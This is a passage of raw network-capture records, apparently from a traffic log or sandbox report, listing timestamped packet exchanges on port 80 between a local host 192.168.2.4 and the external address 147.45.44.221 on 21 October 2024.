                                                                                                                                                    Oct 21, 2024 08:47:30.948116064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948127031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948132038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948137045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948159933 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948172092 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948179007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948190928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948200941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948211908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948221922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948225021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948232889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948251009 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948260069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948263884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948275089 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948286057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948303938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948317051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948328018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948338032 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948350906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948364019 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948371887 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948381901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948393106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948399067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948409081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948421955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948422909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948431969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948436975 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948467970 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948683977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948703051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948713064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948726892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948744059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948750973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948755980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948793888 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948801041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948818922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948831081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948839903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948841095 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948858023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948864937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948870897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948882103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.948890924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948914051 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.948936939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949042082 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949052095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949062109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949085951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949105024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949134111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949142933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949152946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949162960 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949174881 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949184895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949194908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949201107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949204922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949217081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949225903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949229002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949242115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949246883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949264050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949269056 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949275017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949285984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949290037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949297905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949309111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949315071 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949331999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949341059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949414968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949424982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949461937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949464083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949475050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949493885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949503899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949511051 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949515104 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949527025 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949538946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949539900 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949549913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949552059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949570894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949592113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949593067 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949688911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949698925 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949711084 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949721098 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949724913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949754000 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949826002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949836016 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949846029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949865103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949873924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949877977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949883938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949889898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949901104 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949904919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949912071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949923992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949930906 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949934959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949948072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949948072 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949958086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.949963093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949980974 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.949991941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.950002909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.950002909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.950016975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.950037003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.950038910 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.950047970 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.950063944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.950088024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.994716883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.994725943 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.994813919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.995338917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.995374918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.995390892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.995408058 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.995451927 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.041246891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.041256905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.041266918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.041379929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049249887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049271107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049279928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049323082 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049348116 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049365044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049376011 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049386978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049403906 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049407005 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049417973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049431086 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049436092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049437046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049444914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049455881 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049470901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049477100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049479961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049493074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049499989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049504995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049530029 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049544096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049592972 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049602985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049612045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049619913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049628973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049637079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049645901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049664021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049694061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.049720049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.049731970 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065429926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065445900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065455914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065464973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065475941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065485954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065494061 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065499067 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065509081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065519094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065529108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065530062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065541029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065548897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065552950 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065562010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065566063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065576077 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065578938 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065598965 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065603018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065620899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065623999 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065634966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065644026 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065644979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065655947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065663099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065670013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065680981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065681934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065692902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065704107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065705061 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065718889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065722942 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065733910 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065746069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065747023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065758944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065771103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065772057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065779924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065783978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065795898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065805912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065818071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065828085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065838099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065841913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065857887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065876961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065879107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065890074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065898895 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065902948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065907001 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065915108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.065934896 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065958023 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.065990925 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066000938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066010952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066035032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066054106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066063881 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066065073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066075087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066098928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066122055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066359043 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066369057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066380024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066400051 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066426039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066443920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066453934 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066462994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066487074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066509962 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066574097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066591978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066603899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066612959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066625118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066628933 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066634893 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066644907 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066652060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066654921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066672087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066674948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066687107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066695929 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066698074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066715956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066735983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066801071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066812038 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066821098 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066845894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066849947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066859961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066886902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066899061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066910982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066935062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066946983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:31.066968918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066982031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.066992044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.067002058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:31.067013979 CEST8049732147.45.44.221192.168.2.4
